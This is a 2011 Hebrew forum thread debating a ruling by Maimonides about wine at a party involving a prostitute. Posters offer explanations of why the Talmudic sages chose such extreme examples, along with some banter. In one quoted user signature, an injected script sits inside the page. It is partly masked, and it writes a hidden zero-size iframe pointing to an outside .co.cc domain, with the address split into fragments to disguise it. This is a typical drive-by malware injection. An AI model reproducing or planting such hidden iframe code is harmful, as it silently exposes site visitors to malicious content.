| נשלח ב-30/7/2011 21:40 |
|
| |
המדריך ההלכתי לזונה ישראלית במסיבה של גויים
אעתיק לשון הרמב"ם, פרק י"ב מהל' מאכלות אסורות הכ"ו: זונה גויה במסיבה של ישראל היין מותר, שאימתן עליה ולא
תיגע. אבל זונה ישראלית במסיבת גויים יינה שלפניה בכליה אסור, מפני שהן
נוגעין בו שלא מדעתה.
מדוע נזקקו חז"ל לציור המוזר שמתואר לעיל, של יהודים שהגיעו לשפל המדרגה שמקפידים על איסור דרבנן של סתם יינם? אציע שלוש אפשרויות.
1. המצב לא יותר הזוי מהמנהיג בהמה מן היבשה עם חיה שבים, או מהנופל מהגג ובועל את יבמתו. אדרבה, הלכה זו נשמעת מגוחכת דווקא כי היא יותר אקטואלית מכמה הלכות אחרות בש"ס, ולכן במבט ראשון היא נקלטת כהלכה למעשה ולא כהשלכה רחוקה של דרכי הלימוד, ורק כתוצאה מהסיווג הלא-נכון היא נראית מוזרה.
2. כפלח הרימון רקתך. רבים הם מחללי שבתות שמקפידים על כשרות, למרות שאיסורי חזיר ובשר בחלב קלים משבת. אצל חלק מהעם האיסור החמור ביותר שעליו מקפידים אפילו מחללי שבתות ואוכלי טריפות, הוא גילוח בתער. (ביודעי ובמכירי קאמינא. לא הייתי מאמין לולא מראה עיניים.) יש דינים שנקלטים בציבור כעיקרי הדת שגם עבריינים גדולים מקפידים עליהם, ויש שנקלטים כמשהו שעושים בשנת אבל כשצריך להתחזק. אולי בימי חז"ל סתם יינם היה נחשב איסור חמור מאוד שאפילו בשעת מסיבה עם זונה גויה היו מקפידים עליו.
3. לפני זמן מה רעשה העיתונות המשועממת סביב דברי האפיפיור שהתיר שימוש בקונדום להומוסקסואל שעוסק בזנות, כצעד ראשון לקבלת אחריות על עצמו. העיתונאי אנדרו סאליבן, קתולי והומוסקסואל מוצהר, למד מהדברים שהכנסייה אינה מתייאשת אפילו ממי שהגיע לשפל המדרגה, ואומרת לו שאפילו הוא יכול למצוא אצלה הדרכות ששייכות אליו. אצלנו אפשר להסביר באופן דומה, אבל זו כבר דרשנות.
והמוסיף יוסיפו לו מן השמיים.
תוקן על ידי מקסוול ב- 30/07/2011 21:52:03
 |
|
|
|
|
| נשלח ב-3/8/2011 22:00 |
|
| |
| ייתכן כתב: |  |
שותפי,
לנשים וקטנים בלבד.
נלמד עליך זכות שקולמוסך פלט שלא בכוונה.
|
|
מויחל טויבעס.
גם סכסכן, נוסף לכל ?
|
|
|
|
| נשלח ב-3/8/2011 21:48 |
|
| |
שותפי, לנשים וקטנים בלבד. נלמד עליך זכות שקולמוסך פלט שלא בכוונה.
אמשלום, לא שמת לב? פרזנט, לא ירדתי לסוף דעתך.
תוקן על ידי ייתכן ב- 03/08/2011 21:50:05
|
|
|
|
| נשלח ב-3/8/2011 19:29 |
|
| |
| מיימוני כתב: |  | | ליצנות למה לי? קודם נשמע אם יש פה משהו שהליצנות מותרת בו. ובכל מקרה, בא חבר יקר, כותב מליבו, לא חייבים להסכים, אבל רק בדרך ארץ. _________________ שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");> |
|
כיהודה ועוד לקרא התם "מהסיפור על החכם והתם" מרגלא בפומיה 'רק בלי ליצנות' ודפח"ח.
|
|
|
|
|
| נשלח ב-3/8/2011 18:24 |
|
| |
פי האתון, אני לא מקבל את האפולוגיה שלך, אבל לא מצליח להצביע על כשל ספציפי. רק "לא נראה לי". חילך לאפולוגטיקא!
|
|
|
|
| נשלח ב-3/8/2011 17:40 |
|
| |
נוכח, התורה דיברה בהווה מה דינו של שוכב עם אשה שנעשתה זבה או נדה תוך כדי מעשה . וכן לאכילת נבילה שמטמאה גם אם קנו אותה במונסי בהכשר... . וזאת למרות ובפרט ששללו מעשים אלו בכוונה תחילה. לגופו של אשכול ברור שלחכמינו היתה מומחיות למצוא קווי קיצון בדוגמאות שנקטו שכנראה עזרו להם לשנן את ההלכות ולזוכרן אולם מצאנו בסנהדרין ביטוי חריף על אחד שהגזים עם זה ( הביטוי הוא קבסתן למרות שארתח נקט השבוע באחד האשכולות דוגמא זו שעליה הגיב רבו של השואל בלשון צער זו , מסתמא לא דק) .
|
|
|
|
| נשלח ב-3/8/2011 17:13 |
|
| |
מעניין מה מראה לנו העובדה שהתנ"ך מדבר על הלכות טומאה למי ששוכב עם נידה/זבה וכן מי שאוכל נבלה.
|
|
|
|
| נשלח ב-3/8/2011 16:04 |
|
| |
ליצנות למה לי? קודם נשמע אם יש פה משהו שהליצנות מותרת בו. ובכל מקרה, בא חבר יקר, כותב מליבו, לא חייבים להסכים, אבל רק בדרך ארץ.
|
|
|
| נשלח ב-3/8/2011 15:41 |
|
| |
מוכרת מזון. הסיבה לדעה השלילית כלפיה במקרא, זה בגלל ההכשר.
|
|
|
| נשלח ב-3/8/2011 15:21 |
|
| |
שותף אדרבא, הסבר לנו מהי זונה של חז"ל, מהו אתנן זונה שנאסר בתורה, מיהי זונה שנאסרה לכהן ומהו "ויחשבה לזונה".
|
|
|
|
| נשלח ב-3/8/2011 14:52 |
|
| |
| שלויימלע כתב: |  | מה לנו אצל ראשונים שכל דבריהם קודש. מה אנחנו מבינים ב"זונה" של חז"ל... |
|
צדיק אחד בסדום.
|
|
|
|
| נשלח ב-3/8/2011 13:40 |
|
| |
מה לנו אצל ראשונים שכל דבריהם קודש. מה אנחנו מבינים ב"זונה" של חז"ל...
|
|
|
|
| נשלח ב-3/8/2011 11:56 |
|
| |
[אמשלום, "אוהד מתוסכל"? מי שצועק מהיציע "אני הייתי מבקיע את הבעיטה הזו" הוא אוהד חנון עם משקפיים עגולים ומראה של שמאלני. אוהד אמיתי מדבר קודם כל על האמא של השופט, שכידוע קשורה היטב לנושא האשכול!!]
|
|
|
| נשלח ב-3/8/2011 07:04 |
|
| |
[שותפ,
יש לך רעיון פרשני שירים את רמת הדיון מעבר לשיחת הדיוטות? עשה חסד והביאהו. לומר את מה שאמרת, מבלי לגבות זאת בהצעה ממשית, נשמע כמו צעקתו של אוהד מתוסכל מן היציע - "אני הייתי מבקיע את הבעיטה הזו!". יש לזה גם קרדיט דומה...]
|
|
|
|
| נשלח ב-2/8/2011 09:44 |
|
| |
כמובן שגם סוגיה זו בגמרא יש לה פנימיות, וכל ההגשמה הזאת (והסוציולוגיה והפסיכולוגיה הרצות בעיוורון בעקבותיה) הם לנשים וקטנים בלבד. וכמו שקרא לזה הזהר מילי דהדיוטי.
|
|
|
|
|